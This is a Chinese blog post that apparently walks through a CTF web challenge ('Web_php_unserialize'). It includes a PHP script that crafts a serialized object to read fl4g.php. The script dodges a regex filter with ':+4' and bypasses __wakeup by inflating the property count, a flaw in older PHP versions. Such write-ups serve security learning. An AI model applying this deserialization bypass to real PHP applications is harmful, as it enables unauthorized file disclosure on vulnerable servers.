攻防世界——Web_php_unserialize

最新推荐文章于 2023-07-15 20:43:20 发布

Wkingxc

最新推荐文章于 2023-07-15 20:43:20 发布

阅读量97

点赞数

分类专栏： CTF Web安全攻防世界文章标签： php

本文链接：https://blog.csdn.net/qq_31710331/article/details/120089716

版权

CTF 同时被 3 个专栏收录

4 篇文章 0 订阅

订阅专栏

攻防世界

4 篇文章 0 订阅

订阅专栏

Web安全

2 篇文章 0 订阅

订阅专栏

1.代码审计

发现必须构造Demo传入fl4g.php才能得到flag

同时要绕过匹配和反序列化的函数

2.构造绕过

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$a = new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace(':4',':+4',$b);//绕过匹配
$b = str_replace(':1:',':2:',$b);//绕过反序列化__wakeup函数
echo $b;
echo '<br>';
echo (base64_encode($b));
echo '<br>';
?>

在 PHP5 < 5.6.25， PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时，wakeup就会被绕过。

这里我们要注意：这里的file变量为私有变量（protected变量应该也会），所以序列化之后的字符串开头结尾各有一个空白字符（即%00）

　　字符串长度也比实际长度大2，如果将序列化结果复制到在线的base64网站进行编码可能就会丢掉空白字符，从而得到错误的编码值

3.查看构造后的结果，并在传入var

Wkingxc

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
攻防世界——Web_php_unserialize

1.代码审计发现必须构造Demo传入fl4g.php才能得到flag同时要绕过匹配和反序列化的函数2.构造绕过<?phpclass Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight.
复制链接

扫一扫